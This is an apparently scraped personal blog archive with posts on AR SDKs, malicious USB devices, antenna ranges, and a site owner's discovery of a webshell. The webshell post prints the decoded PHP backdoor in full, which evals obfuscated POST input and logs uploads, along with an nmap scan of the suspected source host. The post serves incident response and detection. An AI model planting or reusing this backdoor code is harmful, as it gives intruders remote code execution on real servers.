I was researching on creating a proprietary QR code for a personnel project. I wanted a system where a unique QR code could redirect visitors to website. But i soon realize that QR code would soon be phased out. And then google directed me to Augmented Reality!!! Eureka this should be the future, image recognition to trigger a redirection. And so the quest to find a SDK.
Requirements:
Allow creation of personal AR apps.
Work on Android and iOS
Review of Shortlisted AR
aurasma:
- Payment needed for Skinned app or SDK per app license fees.
+ easy to use
+ well documented
+ community support
+ simple to design personal AR scenes (image targets & expected result)
Vuforia:
- Payment needed to use their Cloud storage feature for dynamic loading of targets
+ Free for SDK and creation of app without having Cloud feature
+ Average documentation (noted some of their samples app are not updated to their latest SDK Version)
+ community support
Wikitude:
- Payment based on image targets for SDK usage. ~ 3Euro per month for each image
+ Easy to create image target and response
ARtoolkit:
- Learning curve to use is high, lacking of sample application to help get user started
+ Free to use
I settled for Vuforia, a somewhat free but usable solution. Using the sample application I began my first AR app within a night.
Saturday, September 21, 2013
Saturday, June 29, 2013
Malicious hardware devices
Now that many electronic devices are MIC (made in Cxxxx) and that they have a known hacking scene, are we safe from becoming another botnet in the world of crime?
Latest in the line is the iphone charger malware poc.
http://www.macworld.co.uk/ipad-iphone/news/?newsid=3450917
A very cool indepth article on "Plug and Prey: Malicious USB Devices"
http://www.irongeek.com/i.php?page=security/plug-and-prey-malicious-usb-devices
And a very cool device "USB Rubber Ducky"
Next time think twice before plugging in any new devices you buy especially if it looks as cute as the yellow ducky.
Latest in the line is the iphone charger malware poc.
http://www.macworld.co.uk/ipad-iphone/news/?newsid=3450917
A very cool indepth article on "Plug and Prey: Malicious USB Devices"
http://www.irongeek.com/i.php?page=security/plug-and-prey-malicious-usb-devices
And a very cool device "USB Rubber Ducky"
Next time think twice before plugging in any new devices you buy especially if it looks as cute as the yellow ducky.
Saturday, June 1, 2013
Effective range of Wireless Router (dBi) antennas
Have you ever wondered what the antennas specification on wireless router meant ? (3dBi, 4dBi, 5dBi ....... ).
I was shopping for a wireless adapter they tend to have many configuration for antennas.
Amazon Alfa wireless usb adapter
Choose a antenna that meets your requirement.
9dBi dipole (1000m)==> signal far at the same horizontal elevation as the transmission point
7dbi dipole (620m)==> offers an optimal balance between range and elevation.
5dbi dipole (500m)==> over a couple of levels of a building
2dbi dipole (300m)==> If you are in a building and need to cover the rooms around you
More information if you are interested.
http://www.liveport.com/wireless-antenna-properties
I was shopping for a wireless adapter they tend to have many configuration for antennas.
Amazon Alfa wireless usb adapter
Choose a antenna that meets your requirement.
9dBi dipole (1000m)==> signal far at the same horizontal elevation as the transmission point
7dbi dipole (620m)==> offers an optimal balance between range and elevation.
5dbi dipole (500m)==> over a couple of levels of a building
2dbi dipole (300m)==> If you are in a building and need to cover the rooms around you
More information if you are interested.
http://www.liveport.com/wireless-antenna-properties
Thursday, January 24, 2013
Discovery of Webshell on Website
Discovered unknown php files located on a website.
When php file contains eval + gzinflate + base64_decode expect it to be malicious in nature.
eval gzinflate base64_decode PHP decoder:
http://www.tareeinternet.com/scripts/decrypt.php
After decoding the file, we get a webshell with fileupload capability.
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_GET['r'])) { print $_GET['r']; }
elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); }
elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;
Updates 25 Jan 2013:
Findings from log indicates that 3 months ago someone from 80.237.132.113 uploaded the webshell using ftp account.
Possibility of entry from ftp brute force is very high as i know the original password is not that complex.
80.237.132.113 is a webserver under construction.
Mitigation:
Change password.
Monitor files.
When php file contains eval + gzinflate + base64_decode expect it to be malicious in nature.
eval gzinflate base64_decode PHP decoder:
http://www.tareeinternet.com/scripts/decrypt.php
After decoding the file, we get a webshell with fileupload capability.
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_GET['r'])) { print $_GET['r']; }
elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); }
elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;
Updates 25 Jan 2013:
Findings from log indicates that 3 months ago someone from 80.237.132.113 uploaded the webshell using ftp account.
Possibility of entry from ftp brute force is very high as i know the original password is not that complex.
80.237.132.113 is a webserver under construction.
80.237.132.113 could just be another victim of the intruder.Host is up (0.30s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
25/tcp open smtp Exim smtpd
80/tcp open http Apache httpd
110/tcp open pop3 Dovecot pop3d
137/tcp open netbios-ns?
138/tcp open netbios-dgm?
139/tcp open netbios-ssn?
143/tcp open imap Dovecot imapd
465/tcp open ssl/smtp Exim smtpd 4.X
587/tcp open smtp Exim
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
2195/tcp open unknown
3306/tcp open mysql MySQL 5.5.28-1~dotdeb.0-log
Mitigation:
Change password.
Monitor files.
Subscribe to:
Posts (Atom)
Posts
